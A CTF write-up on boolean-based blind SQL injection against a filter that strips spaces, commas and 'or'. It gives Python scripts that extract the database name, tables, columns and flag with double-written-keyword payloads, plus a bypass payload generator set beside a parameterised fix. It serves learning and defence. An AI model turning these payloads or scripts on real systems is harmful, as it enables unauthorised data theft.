This challenge is a fairly simple boolean-based blind injection: there is no error echo, only the responses "you are in", "you are not in", and the WAF's injection warning page. Fuzzing the parameter with Burp showed that spaces, union, and, commas and a few other tokens are filtered, while or is not.
Yet a payload using or still returns "you are not in". Why, if or is not blocked? The likely explanation is that the backend silently deletes or from the input on receipt, in which case a change of case or double-writing the keyword should get through. Another writeup (linked at the end) also notes that * appears to be rewritten by the backend: id=0'oorr'1'='1 gives "you are in", but id=0'oorr'1'='1/**/ gives "you are not in", so /**/ cannot stand in for a space either.
That confirms the guess: both double-writing and upper-casing get past the filter. The rest of the brute force is left to scripts. Here they are:
# Database name length
import requests

url = ""                # challenge URL, not given on the page
true_str = 'you are in'   # marker of a TRUE response

for i in range(1, 30):
    # The payload itself was not preserved on the page; this one is reconstructed
    # in the same style as the later scripts (assumption): no spaces or commas,
    # and "or" double-written because the filter deletes it once.
    key = {'id': "0'oorr(length(database())=%d)oorr'0" % i}
    res = requests.post(url, data=key).text
    print(i)
    if true_str in res:
        print('length=%s' % i)
        break
# Database name
import requests

url = ""                # challenge URL, not given on the page
true_str = "you are in"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\\{}?!:@#$&._"
database = ''
print('start')
for i in range(1, 19):
    for j in guess:
        # The payload was not preserved on the page; reconstructed in the style of
        # the later scripts (assumption): mid(str FROM pos FOR len) avoids the
        # filtered comma, and "or" (also inside "for") is double-written.
        key = {'id': "0'oorr((mid(database()from(%s)foorr(1)))='%s')oorr'0" % (i, j)}
        res = requests.post(url, data=key).text
        print('............%s......%s.......' % (i, j))
        if true_str in res:
            database += j
            break
print(database)
print("end!")
# Table names
import requests

url = ""                # challenge URL, not given on the page
true_str = "you are in"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\\{}?!:@#$&._"   # the original omitted 'j'
tables = ''
print('start')
for i in range(1, 15):
    for j in guess:
        # Commas are filtered, so mid(str FROM pos FOR len) replaces mid(str, pos, len).
        # "or" is deleted once by the filter, so every keyword containing it is
        # double-written: oorr, foorr, separatoorr, infoorrmation_schema.
        reg = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0" % (i, j)
        # Spaces are filtered too; MySQL accepts 0x0a (newline) as whitespace.
        reg = reg.replace(' ', chr(0x0a))
        key = {'id': reg}
        r = requests.post(url, data=key).text
        print(i)
        if true_str in r:
            tables += j
            print(tables)
            break
print(tables)
# Column names
import requests

url = ""                # challenge URL, not given on the page
true_str = "you are in"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\\{}?!:@#$&._"   # the original omitted 'j'
columns = ''
print('start')
for i in range(1, 15):
    for j in guess:
        # Same construction as the table-name script, now against
        # information_schema.columns for the table found above ('fiag').
        reg = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0" % (i, j)
        reg = reg.replace(' ', chr(0x0a))   # space -> 0x0a
        key = {'id': reg}
        r = requests.post(url, data=key).text
        print(i)
        if true_str in r:
            columns += j
            print(columns)
            break
print(columns)
# Dump the data (the trailing '-' stands for a space)
import requests

url = ""                # challenge URL, not given on the page
true_str = "you are in"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\\{}?!:@#$&._"   # the original omitted 'j'
datas = ''
print('start')
for i in range(1, 20):
    for j in guess:
        # Read the column found above (fl$4g) from table fiag one character at a time.
        reg = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0" % (i, j)
        reg = reg.replace(' ', chr(0x0a))   # space -> 0x0a (no spaces in this payload anyway)
        key = {'id': reg}
        r = requests.post(url, data=key).text
        print(i)
        if true_str in r:
            datas += j
            print(datas)
            break
print(datas)
Note: id=1'-- gives "you are not in".
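The filter behaviour described at the top of the post, and the reason the double-written payloads in the scripts survive it, as an added example that is not part of the original writeup. The blacklist, its single-pass deletion, and the SQLite-backed stand-in for the challenge page are assumptions made for the demonstration; the real backend is MySQL and its exact filter is unknown. The vulnerable lookup is shown beside a parameterised one so the fix is visible too.

```python
import re
import sqlite3

# Model of the challenge's input filter, as described in the writeup: it strips
# spaces, commas, "union", "and" and "or". That each match is deleted exactly
# once, case-insensitively, is an assumption; it is the behaviour that turns
# "oorr" back into "or" and that deletes a plain "or" outright.
BLACKLIST = ("union", "and", "or", " ", ",")


def waf_filter(value: str) -> str:
    """Delete every blacklisted token from the input, one pass per token."""
    for token in BLACKLIST:
        value = re.sub(re.escape(token), "", value, flags=re.IGNORECASE)
    return value


def double_write(sql: str) -> str:
    """Rewrite a comma-free SQL fragment so that it survives waf_filter() intact.

    Spaces become 0x0a, which MySQL accepts as whitespace. Every blacklisted
    keyword is written inside itself ("or" -> "oorr", "and" -> "aandnd",
    "union" -> "uunionnion"), so deleting one copy leaves the original word.
    This also covers words that merely contain "or": "for" -> "foorr",
    "separator" -> "separatoorr", "information_schema" -> "infoorrmation_schema".
    Commas are not handled: write mid(x from 1 for 1) rather than mid(x, 1, 1).
    """
    out = sql.replace(" ", "\n")
    for kw in ("union", "and", "or"):
        out = re.sub(kw, lambda m: m.group(0)[:1] + m.group(0) + m.group(0)[1:],
                     out, flags=re.IGNORECASE)
    return out


# Constructed stand-in for the challenge's backend: one table, one valid id.
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE users (id TEXT, name TEXT)")
DB.execute("INSERT INTO users VALUES ('1', 'admin')")


def vulnerable_lookup(user_id: str) -> str:
    """Vulnerable pattern: blacklist filter, then string-concatenated SQL.

    Any database error is swallowed, so the caller only ever sees the two
    responses the challenge gives, which is exactly a boolean oracle.
    """
    sql = "SELECT name FROM users WHERE id='%s'" % waf_filter(user_id)
    try:
        row = DB.execute(sql).fetchone()
    except sqlite3.Error:
        row = None
    return "you are in" if row else "you are not in"


def safe_lookup(user_id: str) -> str:
    """Hardened form: the id is bound as a parameter and never parsed as SQL,
    so no keyword blacklist is needed at all."""
    row = DB.execute("SELECT name FROM users WHERE id=?", (user_id,)).fetchone()
    return "you are in" if row else "you are not in"


if __name__ == "__main__":
    for payload in ("1", "0'or'1'='1", "0'oorr'1'='1"):
        print("%-16r vulnerable: %-14s safe: %s"
              % (payload, vulnerable_lookup(payload), safe_lookup(payload)))
    # The table-name payload from the script above, generated from readable SQL.
    plain = ("0'or((select(mid(group_concat(table_name separator '@')from(1)for(1)))"
             "from(information_schema.tables)where(table_schema)=database())='a')or'0")
    print(repr(double_write(plain)))
```

Run stand-alone it prints one line per payload: the plain or is deleted and the query fails closed, the double-written one collapses to a working or and the concatenated query returns the row, and the parameterised lookup is unaffected by either. double_write() regenerates the table-name payload of the script above from its plain-SQL form, which keeps long payloads readable while you write them and makes the filter model easy to adjust if the target strips a different set of tokens.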
Writeups I referred to:
CTF 實驗吧 "認真一點" SQL blind injection
實驗吧 address. Two clearly different pages come back, so this is judged to be SQL blind injection, with sensitive characters filtered. While testing, substr was also found to be filtered; trying a bypass returned the error page, which shows the filter can be bypassed. Brute-forcing the database name length: import requests str1 you are in url for i in range 1,30 key r...
SQL injection: boolean injection, 實驗吧 "認真一點啊!"
Original: Try the simple things first. Entering 1 echoes you are in, anything else echoes you are not in, and entering 1' also echoes you are not in, which shows the single quote is not swallowed and can still be used. Further testing found that and and the space are filtered, while or is not. Constructing id 1 or 0a 1 or id 1 or 1, the echo seen was...